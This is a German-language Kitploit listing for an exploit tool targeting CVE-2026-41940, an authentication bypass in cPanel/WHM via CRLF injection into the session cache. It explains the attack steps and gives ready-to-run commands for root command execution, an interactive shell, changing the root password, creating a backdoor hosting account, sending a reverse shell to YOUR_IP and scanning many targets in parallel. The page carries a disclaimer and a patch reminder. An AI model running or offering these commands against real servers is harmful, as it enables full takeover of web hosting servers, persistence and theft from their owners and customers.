Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41940 — cPanel/WHM Authentifizierungsumgehung (Zero-Day-Schwachstelle) | Kitploit
Tools/GitHubGitHub/kill1234545/cve-2026-41940
Authentifizierung & AutorisierungPrivilege EscalationPersistenzmechanismenSchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstests
GitHubkill1234545/cve-2026-41940

CVE-2026-41940

cPanel/WHM Authentifizierungsumgehung (Zero-Day-Schwachstelle)

Repository anzeigen
102vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-41940: cPanel/WHM Authentifizierungs-Bypass (Einzel- & Mehrfachziel)

Haftungsausschluss: Dieses Dokument und das zugehörige Skript (exploit.py) dienen ausschließlich zu Bildungszwecken, der Sicherheitsforschung und autorisierten Penetrationstests. Verwenden Sie diese Software nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.

Übersicht

exploit.py ist ein Skript, das eine Authentifizierungs-Bypass-Schwachstelle (CVE-2026-41940) in cPanel & WHM demonstriert. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, über einen CRLF-Injektionsfehler eine Root-Sitzung in den Daemon-Cache einzuschleusen, was letztendlich Root-Zugriff auf WHM gewährt, ohne dass gültige Anmeldedaten erforderlich sind.

Schwachstellenanalyse & Exploit-Ablauf

Der Exploit nutzt eine CRLF-Injektionsschwachstelle (Carriage Return Line Feed) im Basic-Authentifizierungsmechanismus, kombiniert mit einem Sitzungs-Propagationsfehler. Das Skript automatisiert den Angriff in vier Phasen:

  1. Pre-Auth-Sitzungs-Minting: Stellt eine Verbindung zu öffentlichen Login-Endpunkten her (z. B. /login/ oder /cgi/login.cgi), um ein Basis-Sitzungscookie ohne Authentifizierung (whostmgrsession) zu erlangen.
  2. CRLF-Injektion: Sendet einen manipulierten Basic-Authentication-Header, der einen Base64-kodierten Payload enthält, der Root-Sitzungsfelder direkt in den cpsrvd-Sitzungs-Cache injiziert. Die Weiterleitungsantwort des Servers gibt das generierte Sicherheitstoken (cpsess) preis.
  3. Sitzungs-Propagation: Das rohe Sitzungscookie wird an einen authentifizierten WHM-Endpunkt gesendet, wodurch do_token_denied ausgelöst wird, um die gefälschte Sitzung in den Daemon-Cache zu propagieren — wodurch sie zu einer gültigen authentifizierten Sitzung wird.
  4. Verifizierung: Greift mithilfe der gefälschten Sitzung auf eingeschränkte WHM-API-Endpunkte (z. B. /json-api/version) zu, um den Root-Zugriff zu bestätigen.

Voraussetzungen

  • Python 3.x
  • requests-Bibliothek
root@kitploit:~
pip install requests

Verwendung

root@kitploit:~
python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

Argumente

Zielauswahl

ArgumentBeschreibung
--target URLEinzelne WHM-URL (z. B. https://target:2087)
--target-file FILEDatei mit Zielen (eine ip:port pro Zeile) — aktiviert automatisch den Prüfmodus

Netzwerk- & Kernoptionen

Exploit-Optionen (Nach dem Bypass)

Ausgabeoptionen

ArgumentBeschreibung
--output FILESitzungstoken und Details in einer JSON-Datei speichern

Beispiele

root@kitploit:~
# Check if target is vulnerable
python exploit.py --target https://target:2087 --check

# Dump server info (version, accounts, privileges)
python exploit.py --target https://target:2087 --dump

# Generate a one-click root login URL (paste in browser immediately)
python exploit.py --target https://target:2087 --session

# Execute a command
python exploit.py --target https://target:2087 --exec "id"

# Drop into an interactive WHM shell
python exploit.py --target https://target:2087 --shell

# Change root password
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# Call WHM API directly
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# Create a backdoor cPanel account
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# Send reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# Override hostname (use when auto-discovery fails)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# Scan multiple targets (check-only mode)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# Save session to file
python exploit.py --target https://target:2087 --dump --output results.json

Interaktive Shell-Befehle

Bei Verwendung von --shell stehen die folgenden Befehle zur Verfügung:


Erinnerung

Wenden Sie die neuesten cPanel/WHM-Sicherheitspatches sofort an.

Tool herunterladen
ArgumentBeschreibung
--threads NParallele Threads für den Mehrfachziel-Modus (Standard: 10)
--hostname HOSTHost-Header überschreiben — verwenden, wenn die automatische Erkennung fehlschlägt oder einen falschen Hostnamen liefert
--timeout NTimeout pro Anfrage in Sekunden (Standard: 15)
--retries NAnzahl der Wiederholungsversuche bei Netzwerkfehlern (Standard: 3)
--cookie-name NAMEEinen bestimmten Sitzungscookie-Namen erzwingen (wird bei Weglassen automatisch erkannt)
--no-verifySchritt-4-Verifizierung überspringen und trotzdem fortfahren
ArgumentBeschreibung
--checkNur-Prüfmodus — Schwachstelle ohne Ausnutzung verifizieren (wird mit --target-file automatisch gesetzt)
--password PASSDas Root-Passwort auf PASS ändern
--api FUNCEine bestimmte WHM-JSON-API-Funktion aufrufen
--api-params K=V,...Kommagetrennte Parameter für --api
--exec CMDEinen Betriebssystembefehl über das WHM-Skript scripts/run_script ausführen (Fallback: rawexec)
--sessionEine Root-Ein-Klick-Login-URL generieren — sofort öffnen, Token läuft schnell ab
--shellIn eine interaktive WHM-Shell wechseln (nur bei Einzelzielen)
--dumpServerinformationen ausgeben: Version, Konten, DNS-Zonen, Berechtigungen
--add-user USER PASS DOMAINEin neues cPanel-Hosting-Konto erstellen
--revshell LHOST LPORTEine Bash-Reverse-Shell an Ihren Listener senden
BefehlBeschreibung
api <function> [k=v ...]Eine WHM-JSON-API-Funktion aufrufen (z. B. api version)
exec <command>Einen Betriebssystembefehl über WHM ausführen (z. B. exec id)
passwd <newpass>Das Root-Passwort ändern
dumpServerinformationen ausgeben
revshell <lhost> <lport>Eine Reverse-Shell senden
add <user> <pass> <domain>Ein cPanel-Konto erstellen
save <path>Die aktuelle Sitzung in einer Datei speichern
exit / quitDie Shell beenden